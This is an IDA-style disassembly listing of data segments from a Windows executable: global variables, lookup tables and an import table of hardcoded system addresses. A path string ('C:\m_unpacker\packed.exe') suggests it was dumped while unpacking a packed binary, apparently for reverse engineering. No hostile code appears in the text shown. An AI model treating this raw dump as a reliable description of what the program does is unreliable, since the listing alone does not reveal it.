dword_4EC04C dd 0 ; DATA XREF: sub_417BC7+17D�w
; sub_417D6B+10D�w ...
dword_4EC050 dd 0 ; DATA XREF: sub_417BC7+156�w
; sub_417E98+4F�r
align 8
dword_4EC058 dd 0 ; DATA XREF: sub_41820B+29�w
; sub_41820B:loc_41838A�w ...
dword_4EC05C dd 0 ; DATA XREF: sub_401C87+3CA2�o
; sub_4180CE+12�o ...
dd 0
dword_4EC064 dd 0 ; DATA XREF: sub_41820B+21�r
; sub_4183AA+3A�r
dd 7Fh dup(0)
dword_4EC264 dd 0 ; DATA XREF: sub_41820B+1B�r
; sub_4183AA+4A�w
dd 1944h dup(0)
byte_4F2778 db 0 ; DATA XREF: sub_4183AA+23�o
; _2:0044F9E4�o
byte_4F2779 db 0 ; DATA XREF: _2:0044F9E8�o
byte_4F277A db 0 ; DATA XREF: _2:0044F9F0�o
byte_4F277B db 0 ; DATA XREF: _2:0044F9F4�o
byte_4F277C db 0 ; DATA XREF: sub_401C87+3CC0�o
; sub_4180CE+3C�o ...
byte_4F277D db 0 ; DATA XREF: _2:0044F9FC�o
byte_4F277E db 0 ; DATA XREF: _2:0044FA18�o
byte_4F277F db 0 ; DATA XREF: _2:0044FA20�o
byte_4F2780 db 0 ; DATA XREF: _2:0044FA24�o
byte_4F2781 db 0 ; DATA XREF: _2:0044FA30�o
byte_4F2782 db 0 ; DATA XREF: _2:0044FA34�o
byte_4F2783 db 0 ; DATA XREF: _2:0044FA3C�o
align 8
dword_4F2788 dd 80h dup(0) ; DATA XREF: sub_418C20+6A�o
dword_4F2988 dd 2 dup(0) ; DATA XREF: sub_418EAE+E9�o
dword_4F2990 dd 18h dup(0) ; DATA XREF: sub_419479:loc_419596�o
; sub_419479+131�o ...
dword_4F29F0 dd 80h dup(0) ; DATA XREF: sub_41A20B+7C�o
; sub_41A20B+A5�o
dword_4F2BF0 dd 0 ; DATA XREF: sub_4197F6+45�w
; sub_4197F6+4D�r ...
align 8
dword_4F2BF8 dd 18h dup(0) ; DATA XREF: sub_41A0D7:loc_41A1F9�o
; sub_41A0D7+12D�o
dword_4F2C58 dd 80h dup(0) ; DATA XREF: sub_419737+4B�o
; sub_419737+7D�o ...
byte_4F2E58 db 0 ; DATA XREF: sub_4197F6+29�r
; sub_4197F6+34�w
align 10h
dword_4F2E60 dd 80h dup(0) ; DATA XREF: sub_419A4D+61�o
; sub_419A4D+88�o ...
dword_4F3060 dd 80h dup(0) ; DATA XREF: sub_419350+33�o
; sub_419350+50�o ...
dword_4F3260 dd 0 ; DATA XREF: sub_41A6A9:loc_41A6CA�r
; sub_41A798+54�r ...
dword_4F3264 dd 0 ; DATA XREF: sub_41A6A9�r
; sub_41A798+37�r ...
dword_4F3268 dd 0 ; DATA XREF: sub_41A6D9+1A�r
; sub_41A8ED+83�o
dword_4F326C dd 0 ; DATA XREF: sub_41A6A9:loc_41A6BD�r
; sub_41A8ED+11B�w
dword_4F3270 dd 0Dh dup(0) ; DATA XREF: sub_41A798+13�o
; sub_41A8ED:loc_41AA2E�o
dword_4F32A4 dd 0 ; DATA XREF: sub_41A798+CD�r
; sub_41A798+EC�r ...
byte_4F32A8 db 0 ; DATA XREF: sub_41A711+9�o
byte_4F32A9 db 0 ; DATA XREF: sub_41A8ED+DF�o
word_4F32AA dw 0 ; DATA XREF: sub_41A8ED:loc_41AA29�o
dword_4F32AC dd 0Ch dup(0) ; DATA XREF: sub_41B51B+3E�o
db 2 dup(0)
word_4F32DE dw 0 ; DATA XREF: sub_41B6C1+13�o
dword_4F32E0 dd 0AA1E90h ; DATA XREF: sub_41BF80+262�w
; sub_41C3F0:loc_41C82B�r ...
dword_4F32E4 dd 1545h ; DATA XREF: sub_41BF80:loc_41C193�r
; sub_41BF80+21C�w ...
dword_4F32E8 dd 0AA3230h ; DATA XREF: sub_41BF80:loc_41C1C9�r
; sub_41BF80+252�r ...
dword_4F32EC dd 118Ah ; DATA XREF: sub_41BF80+222�r
; sub_41BF80+22A�w ...
dword_4F32F0 dd 118Ah ; DATA XREF: sub_41BF80+235�r
; sub_41BF80+243�w ...
dword_4F32F4 dd 0 ; DATA XREF: sub_4314E0+217�r
dword_4F32F8 dd 0A28h ; DATA XREF: sub_41D6B0:loc_41D71A�r
; sub_41D6B0:loc_41D78D�r ...
dword_4F32FC dd 501h ; DATA XREF: _0:00422164�w
dword_4F3300 dd 5 ; DATA XREF: _0:0042214F�w _0:00422155�r
dword_4F3304 dd 1 ; DATA XREF: _0:0042213E�w _0:0042215E�r
dword_4F3308 dd 1 ; DATA XREF: sub_401404:loc_4016E7�r
; sub_42F3E0+C6�w
dword_4F330C dd 0AA2840h ; DATA XREF: sub_401404+2EC�r
; sub_401404+30C�r ...
dd 0
dword_4F3314 dd 0AA2888h ; DATA XREF: sub_42F290+7B�w
; sub_42F290+81�r ...
dword_4F3318 dd 0 ; DATA XREF: sub_439F20+49�r
dword_4F331C dd 0 ; DATA XREF: sub_4374C0+24�r
; sub_4396D0+6�r ...
dd 0
off_4F3324 dd offset aCM_unpackerPac ; DATA XREF: sub_42F3E0+26�w
; sub_42F3E0+3C�r
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4F332C db 0 ; DATA XREF: sub_41E920+30�w
; sub_422400+8�r
align 10h
dword_4F3330 dd 0 ; DATA XREF: sub_41E920:loc_41E943�w
dword_4F3334 dd 0 ; DATA XREF: sub_41E920+9�r
; sub_41E920:loc_41E9EB�w
dword_4F3338 dd 0 ; DATA XREF: sub_41E920+95�r
; sub_41E920+AF�w
dword_4F333C dd 0 ; DATA XREF: _0:004201C4�r _0:004201CF�w
dword_4F3340 dd 0 ; DATA XREF: sub_420130+10�w
align 8
dword_4F3348 dd 0 ; DATA XREF: sub_420D80+88�r
; sub_420D80+F8�w
align 10h
dword_4F3350 dd 0 ; DATA XREF: sub_420D80+7D�r
; sub_420D80+100�w ...
byte_4F3354 db 2 dup(0) ; DATA XREF: sub_420D80+109�w
word_4F3356 dw 0 ; DATA XREF: sub_420D80+52�r
dword_4F3358 dd 0 ; DATA XREF: sub_420D80+3D�r
; sub_420D80+112�w ...
dword_4F335C dd 0 ; DATA XREF: sub_420D80+11A�w
dword_4F3360 dd 0 ; DATA XREF: _0:004221C3�w
; sub_42F290+1B�r ...
align 8
dword_4F3368 dd 0 ; DATA XREF: sub_422270+3�r
; sub_4222A0+3�r ...
dword_4F336C dd 0 ; DATA XREF: sub_4277D0:loc_427A95�r
; sub_4277D0+2CE�w ...
dword_4F3370 dd 0 ; DATA XREF: sub_422610+93�r
; sub_422610+C8�w ...
dword_4F3374 dd 0 ; DATA XREF: sub_41BE40+A�r
; sub_41BE70+10�r ...
dword_4F3378 dd 0 ; DATA XREF: _0:0042313E�r _0:00423149�w ...
align 10h
dword_4F3380 dd 144D08h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: _2:off_451AF4�o
byte_4F3398 db 90h ; DATA XREF: _2:off_451B34�o
db 4Ch, 14h, 0
dd 0FFFFFFFFh, 4 dup(0)
dword_4F33B0 dd 144CE0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: _2:off_451B14�o
dword_4F33C8 dd 144CB8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: _2:off_451B24�o
dword_4F33E0 dd 0 ; DATA XREF: sub_425FB0+8B�r
; sub_425FB0+93�w ...
dword_4F33E4 dd 1 ; DATA XREF: sub_4290B0:loc_4293C2�r
; sub_429400+3�w ...
dword_4F33E8 dd 0 ; DATA XREF: sub_429C90+A6�r
; sub_429C90+C9�w ...
align 10h
dword_4F33F0 dd 0 ; DATA XREF: sub_420F10+C�o
; sub_42DE80+82�r ...
align 8
dword_4F33F8 dd 0 ; DATA XREF: sub_421620+D�r
; sub_421620:loc_4216B6�r ...
dword_4F33FC dd 0 ; DATA XREF: sub_434620+4�r
dword_4F3400 dd 0 ; DATA XREF: sub_4342F0+18�r
dword_4F3404 dd 0 ; DATA XREF: sub_433970+4�r
dword_4F3408 dd 0 ; DATA XREF: sub_421F10+B9�r
; sub_421F10+16C�r ...
dword_4F340C dd 0 ; DATA XREF: sub_42DE80+11F�w
dword_4F3410 dd 0 ; DATA XREF: sub_42E120+C7�o
; sub_42E120+140�o
word_4F3414 dw 0 ; DATA XREF: sub_42E120+E8�r
align 4
dword_4F3418 dd 0 ; DATA XREF: sub_42E120+EF�w
; sub_42E120+159�o
dword_4F341C dd 1 ; DATA XREF: sub_42EC50+26�r
; sub_42EC50+4B�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_42F3E0+19�o
; sub_42F3E0+26�o ...
align 4
dd 3Ah dup(0)
dword_4F3524 dd 1 ; DATA XREF: sub_42F8F0+14�r
; sub_42F8F0+2C�w ...
dword_4F3528 dd 0 ; DATA XREF: sub_42FEE0+2B�r
; sub_42FEE0+34�r
dword_4F352C dd 0 ; DATA XREF: _0:loc_4305C6�r
; _0:004305D2�w ...
dword_4F3530 dd 0 ; DATA XREF: _0:loc_4305DA�r
; _0:004305E5�w ...
dword_4F3534 dd 0 ; DATA XREF: _0:loc_4305ED�r
; _0:004305F9�w ...
dword_4F3538 dd 0 ; DATA XREF: _0:loc_430600�r
; _0:0043060C�w ...
dword_4F353C dd 0 ; DATA XREF: _0:loc_43055A�r
; _0:00430575�w
dword_4F3540 dd 0 ; DATA XREF: sub_430AA0+D�r
; sub_430AA0+39�w ...
dword_4F3544 dd 0 ; DATA XREF: sub_430AA0+5A�w
; sub_430AA0:loc_430B13�r ...
dword_4F3548 dd 0 ; DATA XREF: sub_430AA0+6E�w
; sub_430AA0+8B�r ...
dword_4F354C dd 1 ; DATA XREF: sub_431210+26�r
; sub_431210+46�w ...
dword_4F3550 dd 0 ; DATA XREF: sub_4277D0+9�r
dword_4F3554 dd 77C26E79h ; DATA XREF: sub_432EE0:loc_432F0E�r
; sub_432EE0+37�r ...
dword_4F3558 dd 0 ; DATA XREF: sub_433090+17�w
; sub_433090+6D�w ...
align 10h
dword_4F3560 dd 0 ; DATA XREF: sub_433090+59�o
; sub_433090+77�r
dword_4F3564 dd 10h dup(0) ; DATA XREF: sub_433090+103�o
word_4F35A4 dw 0 ; DATA XREF: sub_433470+FC�r
word_4F35A6 dw 0 ; DATA XREF: sub_433090+88�r
; sub_433470+145�r ...
word_4F35A8 dw 0 ; DATA XREF: sub_433470+132�r
word_4F35AA dw 0 ; DATA XREF: sub_433470+13B�r
; sub_433470+18B�r
word_4F35AC dw 0 ; DATA XREF: sub_433470+126�r
; sub_433470+181�r
word_4F35AE dw 0 ; DATA XREF: sub_433470+11C�r
; sub_433470+177�r
word_4F35B0 dw 0 ; DATA XREF: sub_433470+113�r
; sub_433470+16E�r
word_4F35B2 dw 0 ; DATA XREF: sub_433470+109�r
; sub_433470+164�r
dword_4F35B4 dd 0 ; DATA XREF: sub_433090+93�r
; sub_433090+CE�r
dword_4F35B8 dd 10h dup(0) ; DATA XREF: sub_433090+149�o
word_4F35F8 dw 0 ; DATA XREF: sub_433470+43�r
word_4F35FA dw 0 ; DATA XREF: sub_433090+AB�r
; sub_433470+8C�r ...
word_4F35FC dw 0 ; DATA XREF: sub_433470+79�r
word_4F35FE dw 0 ; DATA XREF: sub_433470+82�r
; sub_433470+D2�r
word_4F3600 dw 0 ; DATA XREF: sub_433470+6D�r
; sub_433470+C8�r
word_4F3602 dw 0 ; DATA XREF: sub_433470+63�r
; sub_433470+BE�r
word_4F3604 dw 0 ; DATA XREF: sub_433470+5A�r
; sub_433470+B5�r
word_4F3606 dw 0 ; DATA XREF: sub_433470+50�r
; sub_433470+AB�r
dword_4F3608 dd 0 ; DATA XREF: sub_433090+B6�r
; sub_433090+C9�r
dword_4F360C dd 0 ; DATA XREF: sub_433090+18D�r
; sub_433090+196�r ...
dword_4F3610 dd 0 ; DATA XREF: sub_433030+3�r
; sub_433030+16�r ...
dword_4F3614 dd 0 ; DATA XREF: sub_433970+75�r
; sub_433970+86�r ...
dword_4F3618 dd 0 ; DATA XREF: sub_4342F0+25�o
; sub_4342F0+93�r ...
dword_4F361C dd 0 ; DATA XREF: sub_4342F0+42�o
; sub_4342F0+A3�r ...
dword_4F3620 dd 0 ; DATA XREF: sub_4342F0+5F�o
; sub_4342F0+7C�r ...
dword_4F3624 dd 0 ; DATA XREF: sub_434620+A0�r
; sub_434620+B1�r ...
dword_4F3628 dd 0 ; DATA XREF: sub_434A80+2AA�r
; sub_434A80+2B5�r ...
dword_4F362C dd 0 ; DATA XREF: sub_434A80+2CC�r
; sub_434A80+2D7�r ...
dword_4F3630 dd 3 dup(0) ; DATA XREF: sub_42DE80+94�o
; sub_42DE80+F3�o
word_4F363C dw 0 ; DATA XREF: sub_434A80+36�r
align 10h
dd 0
word_4F3644 dw 0 ; DATA XREF: sub_434750+F�r
align 4
db 2 dup(0)
word_4F364A dw 0 ; DATA XREF: sub_4342F0+F�r
db 2 dup(0)
word_4F364E dw 0 ; DATA XREF: sub_433A50+F�r
word_4F3650 dw 0 ; DATA XREF: sub_433A50+1A�r
align 4
dword_4F3654 dd 0 ; DATA XREF: sub_434EB0+155�r
; sub_434EB0+176�r ...
dword_4F3658 dd 0 ; DATA XREF: sub_435140+37�w
; sub_435200+1B�r ...
dword_4F365C dd 0 ; DATA XREF: sub_435140+6E�w
; sub_435200+101�r ...
dword_4F3660 dd 0 ; DATA XREF: sub_435140+1A�w
; sub_435140+47�r ...
dword_4F3664 dd 0 ; DATA XREF: sub_434EB0+45�w
; sub_434EB0+4B�r ...
dword_4F3668 dd 0 ; DATA XREF: sub_434EB0+7A�w
; sub_434EB0+80�r ...
dword_4F366C dd 0 ; DATA XREF: sub_434EB0:loc_434F59�w
; sub_434EB0:loc_434FBE�r ...
dword_4F3670 dd 0 ; DATA XREF: sub_434EB0+182�r
; sub_434EB0+1CB�r ...
dword_4F3674 dd 0 ; DATA XREF: sub_434EB0+6�r
; sub_434EB0+2C�w ...
dword_4F3678 dd 0 ; DATA XREF: sub_4314E0:loc_43153C�r
byte_4F367C db 0 ; DATA XREF: sub_438A00+18F�o
; sub_438A00+1F2�r ...
align 10h
dd 0
dword_4F3684 dd 0 ; DATA XREF: sub_4349E0+11�o
; _2:off_454DEC�o ...
dword_4F3688 dd 0 ; DATA XREF: sub_438CA0+26�r
; sub_438CA0+46�w ...
dword_4F368C dd 0 ; DATA XREF: sub_439780+26�r
; sub_439780+41�w ...
dword_4F3690 dd 0 ; DATA XREF: sub_439920+26�r
; sub_439920+41�w ...
dword_4F3694 dd 0 ; DATA XREF: sub_439AD0+26�r
; sub_439AD0+4B�w ...
dword_4F3698 dd 0 ; DATA XREF: sub_43B420+26�r
; sub_43B420+4B�w ...
byte_4F369C db 1 ; DATA XREF: sub_40E188�r sub_40E188+9�w
align 10h
dword_4F36A0 dd 0 ; DATA XREF: sub_437B80+90�w
; sub_437B80+A5�w ...
dword_4F36A4 dd 0 ; DATA XREF: sub_437D10+1C4�w
; sub_437D10+1ED�w ...
dd 6 dup(0)
dword_4F36C0 dd 0AA1F58h ; DATA XREF: sub_4222D0+ED�r
; sub_4222D0+109�r ...
dd 3Fh dup(0)
dword_4F37C0 dd 20h ; DATA XREF: sub_422CB0+7�r
; sub_4272F0+7�r ...
dword_4F37C4 dd 0 ; DATA XREF: sub_420F10+5A�r
; sub_421620+68�r ...
dword_4F37C8 dd 0 ; DATA XREF: sub_420F10:loc_420F63�w
; sub_420F10:loc_420F77�w ...
dword_4F37CC dd 4E4h ; DATA XREF: sub_4290B0+22�r
; sub_4290B0+14A�w ...
word_4F37D0 dw 0 ; DATA XREF: sub_4290B0+19A�w
; sub_4290B0+2F3�w ...
align 4
dd 2 dup(0)
dword_4F37DC dd 0 ; DATA XREF: sub_4290B0+150�w
; sub_4290B0+2C2�w ...
byte_4F37E0 db 0 ; DATA XREF: sub_429560+1CE�w
; sub_429560+21A�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4F38E0 db 0 ; DATA XREF: sub_4290B0+AB�w
; sub_4290B0+1F4�w ...
byte_4F38E1 db 0 ; DATA XREF: sub_41ED30+92�r
; sub_4290B0+129�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4F39E4 dd 0 ; DATA XREF: sub_4290B0+169�w
; sub_4290B0+205�w ...
dword_4F39E8 dd 0AA0000h ; DATA XREF: sub_41D6B0+8D�r
; sub_41D6B0+FB�r ...
dword_4F39EC dd 1 ; DATA XREF: sub_41D6B0:loc_41D6E1�r
; sub_41D6B0:loc_41D74E�r ...
dword_4F39F0 dd 0 ; DATA XREF: sub_424080+51�w
; sub_424CD0+9�r ...
dword_4F39F4 dd 0 ; DATA XREF: sub_4241B0+484�r
; sub_4241B0+4B3�r ...
dword_4F39F8 dd 0 ; DATA XREF: sub_424080+37�w
; sub_4241B0+5C1�w ...
align 10h
dword_4F3A00 dd 0 ; DATA XREF: sub_424080+3D�w
; sub_4241B0+477�r ...
dword_4F3A04 dd 0 ; DATA XREF: sub_424080+47�w
; sub_4240F0+6�r ...
dword_4F3A08 dd 0 ; DATA XREF: sub_424080+16�w
; sub_424080+1B�r ...
dword_4F3A0C dd 0 ; DATA XREF: sub_4234C0+2F�r
; sub_423620+6D�r ...
dword_4F3A10 dd 0 ; DATA XREF: _0:004225F4�r _0:004225FF�w ...
dword_4F3A14 dd 0AA3250h ; DATA XREF: sub_4222D0+48�w
; sub_4222D0+4D�r ...
align 10h
dword_4F3A20 dd 400h dup(0) ; DATA XREF: _2:off_451848�o
; _2:00451850�o
dword_4F4A20 dd 200h ; DATA XREF: sub_4222D0+4�r
; sub_4222D0+D�w ...
dword_4F4A24 dd 142340h ; DATA XREF: _0:004221B9�w
; sub_42F1D0:loc_42F1E2�r ...
dword_4F4A28 dd 1 ; DATA XREF: sub_42F290+13B�w
; sub_4374C0+E�r
dword_4F4A2C dd 1 ; DATA XREF: sub_429890+3�r
; sub_429890+16�w ...
dword_4F4A30 dd 0AA241Ch ; DATA XREF: sub_41E920+45�r
; sub_420C50+19�r ...
dword_4F4A34 dd 0AA2410h ; DATA XREF: sub_41E920+3C�r
; sub_41E920+5A�r ...
dword_4F4A38 dd 0 ; DATA XREF: _0:0041D914�r _0:0041D91F�w ...
byte_4F4A3C db 1 ; DATA XREF: sub_43A8E0+5�r
; sub_43A8E0+11�r ...
_2 ends
; Section 4. (virtual address 000F5000)
; Virtual size : 00000F4E ( 3918.)
; Section size in file : 00000F4E ( 3918.)
; Offset to raw data for section: 000F5000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_3 segment para public 'CODE' use32
assume cs:_3
;org 4F5000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dd 0F5270h, 0FFFFFFFEh, 0
dd 0F556Eh, 0F54F4h, 0F5278h, 0FFFFFFFEh, 0
dd 0F5584h, 0F54FCh, 0F5050h, 0FFFFFFFEh, 0
dd 0F5F40h, 0F52D4h, 5 dup(0)
dd 0F598Eh, 0F5F26h, 0F5F14h, 0F5F02h, 0F5EF0h, 0F5EE0h
dd 0F5ECAh, 0F5EB4h, 0F5EA2h, 0F5E92h, 0F5E82h, 0F5E64h
dd 0F5E52h, 0F5E40h, 0F5E2Ch, 0F5E1Ch, 0F5E0Eh, 0F5DFCh
dd 0F5DE2h, 0F5DCAh, 0F5DB0h, 0F5D96h, 0F5D7Ah, 0F5D6Ah
dd 0F5D5Ah, 0F5590h, 0F559Eh, 0F55ACh, 0F55BEh, 0F55D4h
dd 0F55EAh, 0F55F2h, 0F5602h, 0F5610h, 0F561Eh, 0F5634h
dd 0F5644h, 0F5650h, 0F5666h, 0F567Ch, 0F5690h, 0F56A6h
dd 0F56B6h, 0F56C6h, 0F56D8h, 0F56E8h, 0F56F4h, 0F5704h
dd 0F5716h, 0F572Ah, 0F573Ch, 0F574Ch, 0F575Ah, 0F5772h
dd 0F578Ah, 0F57B2h, 0F57CAh, 0F57D6h, 0F57E6h, 0F57F2h
dd 0F5800h, 0F5814h, 0F5826h, 0F583Ah, 0F5848h, 0F585Ah
dd 0F586Ch, 0F587Ah, 0F5886h, 0F589Eh, 0F58B8h, 0F58C8h
dd 0F58DAh, 0F58ECh, 0F5904h, 0F591Eh, 0F593Ah, 0F594Ah
dd 0F5964h, 0F5980h, 0F59A8h, 0F59B4h, 0F59C0h, 0F59D2h
dd 0F59E4h, 0F59F8h, 0F5A08h, 0F5A1Ah, 0F5A2Ah, 0F5A38h
dd 0F5A4Ah, 0F5A5Ah, 0F5A70h, 0F5A7Eh, 0F5A8Ch, 0F5AA8h
dd 0F5ABEh, 0F5AD4h, 0F5AE0h, 0F5AF6h, 0F5B06h, 0F5B1Ah
dd 0F5B30h, 0F5B40h, 0F5B50h, 0F5B60h, 0F5B6Ch, 0F5B86h
dd 0F5B96h, 0F5BAEh, 0F5BC6h, 0F5BD8h, 0F5BEAh, 0F5BF8h
dd 0F5C06h, 0F5C16h, 0F5C2Ch, 0F5C48h, 0F5C58h, 0F5C66h
dd 0F5C74h, 0F5C84h, 0F5C9Eh, 0F5CACh, 0F5CBAh, 0F5CD0h
dd 0F5CDEh, 0F5CEAh, 0F5CF4h, 0F5D04h, 0F5D12h, 0F5D26h
dd 0F5D32h, 0F5D3Ch, 0F5D48h, 0
dd 0F5558h, 0
dd 80000007h, 8000000Fh, 8000000Ch, 80000074h, 80000073h
dd 80000015h, 8000000Ah, 80000002h, 8000000Dh, 80000001h
dd 0F5576h, 8000000Bh, 80000009h, 80000004h, 80000010h
dd 80000003h, 80000017h, 80000013h, 80000012h, 80000097h
dd 80000006h, 80000034h, 0
dword_4F52D4 dd 77E78147h ; DATA XREF: sub_41786C+BC�r
; _0:0043AB0A�r
dword_4F52D8 dd 77E6BD68h ; DATA XREF: sub_439F20+2C5�r
; _0:0043ACE4�r
dword_4F52DC dd 77E77F2Eh ; DATA XREF: sub_439AD0+41�r
; sub_439AD0+3DA�r ...
dword_4F52E0 dd 77E762D0h ; DATA XREF: sub_439AD0+69�r
; sub_439AD0+D9�r ...
dword_4F52E4 dd 77E78723h ; DATA XREF: sub_439780+37�r
; sub_439780+8B�r ...
dword_4F52E8 dd 77E70192h ; DATA XREF: sub_435EC0+1D8�r
; _0:0043ACCC�r
dword_4F52EC dd 77E79C94h ; DATA XREF: sub_4357D0+12�r
; _0:0043ACC6�r
dword_4F52F0 dd 77E6363Bh ; DATA XREF: sub_435140+7A�r
; sub_435530+53�r ...
dword_4F52F4 dd 77E75243h ; DATA XREF: sub_434EB0+142�r
; _0:0043ACBA�r
dword_4F52F8 dd 77E752B8h ; DATA XREF: sub_434EB0+15C�r
; _0:0043ACB4�r
dword_4F52FC dd 77E7176Ch ; DATA XREF: sub_432FE0+F�r
; _0:0043ACAE�r
off_4F5300 dd offset sub_509C54 ; DATA XREF: sub_432F40+8�r
; sub_432F60+9�r ...
dword_4F5304 dd 77E7C866h ; DATA XREF: sub_431210+3C�r
; sub_431210+19E�r ...
dword_4F5308 dd 77E641EBh ; DATA XREF: sub_431210+61�r
; sub_431210+AA�r ...
dword_4F530C dd 77E73FF9h ; DATA XREF: sub_431130+7F�r
; _0:0043AC96�r
dword_4F5310 dd 77E7FF2Eh ; DATA XREF: sub_430D50+58�r
; sub_430D50+66�r ...
dword_4F5314 dd 77E78406h ; DATA XREF: sub_42FB10+1E6�r
; sub_42FB10+29B�r ...
dword_4F5318 dd 77E7C931h ; DATA XREF: sub_42FB10+31A�r
; _0:0043AC84�r
dword_4F531C dd 77E77EE1h ; DATA XREF: sub_42F8F0+1D�r
; sub_42F8F0+6D�r ...
dword_4F5320 dd 77E67702h ; DATA XREF: sub_42F8F0:loc_42F928�r
; sub_42F8F0+171�r ...
dword_4F5324 dd 77E7C9E1h ; DATA XREF: sub_42F8F0+108�r
; sub_42F8F0+150�r ...
dword_4F5328 dd 77E9C5B1h ; DATA XREF: sub_42F8F0+1E6�r
; sub_42F8F0+208�r ...
dword_4F532C dd 77EB9A84h ; DATA XREF: sub_42EFB0+37�r
; _0:0043AC66�r
dword_4F5330 dd 77E781F9h ; DATA XREF: sub_42EC50+41�r
; sub_42EC50+1A5�r ...
dword_4F5334 dd 77E77405h ; DATA XREF: sub_42EC50+69�r
; sub_42EC50+C0�r ...
off_4F5338 dd offset sub_50A0C8 ; DATA XREF: sub_401300+DF�r
; sub_401404+7A�r ...
off_4F533C dd offset sub_50B3D5 ; DATA XREF: sub_401300+B8�r
; sub_401404+2C9�r ...
dword_4F5340 dd 77E61BB8h ; DATA XREF: sub_401300+A7�r
; sub_401404+2B1�r ...
off_4F5344 dd offset sub_50AA24 ; DATA XREF: sub_401300+83�r
; sub_401404+DA�r ...
dword_4F5348 dd 77E704FCh ; DATA XREF: sub_401300+74�r
; sub_401404+C4�r ...
dword_4F534C dd 77E61BE6h ; DATA XREF: sub_401300+29�r
; sub_401404+1DE�r ...
dword_4F5350 dd 77E7AC37h ; DATA XREF: sub_401404+3AC�r
; sub_401C87+785�r ...
dword_4F5354 dd 77E73628h ; DATA XREF: sub_401404+329�r
; sub_401C87+7908�r ...
dword_4F5358 dd 77E706B7h ; DATA XREF: sub_401404+262�r
; sub_417BC7+15�r ...
dword_4F535C dd 77E80656h ; DATA XREF: sub_401404+255�r
; _0:0043A9F6�r
dword_4F5360 dd 77F5157Dh ; DATA XREF: sub_401404:loc_4015C6�r
; sub_401404+3D1�r ...
dword_4F5364 dd 77E6BD13h ; DATA XREF: sub_401404:loc_4015BC�r
; _0:0043AA02�r
dword_4F5368 dd 77E70396h ; DATA XREF: sub_401404+1B2�r
; sub_401404+20F�r ...
off_4F536C dd offset sub_50A7AF ; DATA XREF: sub_401404+19B�r
; sub_40FFD8+10F�r ...
off_4F5370 dd offset sub_50AF8C ; DATA XREF: sub_401404+D3�r
; sub_409D10+2�r ...
dword_4F5374 dd 77E79D5Bh ; DATA XREF: sub_401404+6B�r
; sub_401404+2FF�r ...
dword_4F5378 dd 77E7C2C4h ; DATA XREF: sub_401404+64�r
; _0:0043AA20�r
dword_4F537C dd 77E7751Ah ; DATA XREF: sub_401404+2C�r
; sub_401C87+251A�r ...
dword_4F5380 dd 77E75CEBh ; DATA XREF: sub_401C87+7B85�r
; sub_40B7CC+27�r ...
dword_4F5384 dd 77E6AD34h ; DATA XREF: sub_401C87+6A47�r
; sub_418EAE+35�r ...
dword_4F5388 dd 77E71AFEh ; DATA XREF: sub_401C87+6834�r
; _0:0043AA38�r
off_4F538C dd offset sub_50AE83 ; DATA XREF: sub_409D10+13A�r
; sub_409D10:loc_40A21E�r ...
off_4F5390 dd offset sub_50B076 ; DATA XREF: sub_409D10+11�r
; sub_41786C+60�r ...
dword_4F5394 dd 77E65F4Ch ; DATA XREF: _0:0040B0E8�r
; sub_41A20B+34�r ...
dword_4F5398 dd 77E7513Ch ; DATA XREF: _0:0040B18A�r
; sub_434EB0+18�r ...
dword_4F539C dd 77E7C657h ; DATA XREF: _0:0040B1FE�r
; sub_419036+32�r ...
dword_4F53A0 dd 77E73C49h ; DATA XREF: sub_40B6FC+4A�r
; sub_40BE20+1AC�r ...
dword_4F53A4 dd 77F7E300h ; DATA XREF: sub_40C87D+130�r
; sub_422490+35�r ...
dword_4F53A8 dd 77F7E21Fh ; DATA XREF: sub_40C87D+C5�r
; sub_422420+35�r ...
dword_4F53AC dd 77E7C706h ; DATA XREF: sub_40CA91+77�r
; _0:0043AA6E�r
dword_4F53B0 dd 77F53275h ; DATA XREF: sub_40CA91+6B�r
; sub_40CA91+241�r ...
dword_4F53B4 dd 77E79D8Ch ; DATA XREF: sub_40E1AD+94�r
; sub_40E29B+17D�r ...
dword_4F53B8 dd 77E737DEh ; DATA XREF: sub_40E29B+42E�r
; _0:0043AA80�r
off_4F53BC dd offset sub_50B3FC ; DATA XREF: sub_40E29B+19B�r
; sub_40E29B+48D�r ...
off_4F53C0 dd offset sub_50B2B0 ; DATA XREF: sub_40E29B+A3�r
; sub_40FFD8+1C3�r ...
dword_4F53C4 dd 77E616B4h ; DATA XREF: sub_40EE63+19B�r
; sub_4115D0+119�r ...
dword_4F53C8 dd 77E79CE3h ; DATA XREF: sub_40EE63+111�r
; sub_41181E+77�r ...
dword_4F53CC dd 77E79C90h ; DATA XREF: sub_40EE63+FD�r
; sub_40EE63+10A�r ...
dword_4F53D0 dd 77E7727Ah ; DATA XREF: sub_40EE63+74�r
; sub_411725+23�r ...
dword_4F53D4 dd 77E64106h ; DATA XREF: sub_40FE5C+9F�r
; sub_41B6C1+1B6�r ...
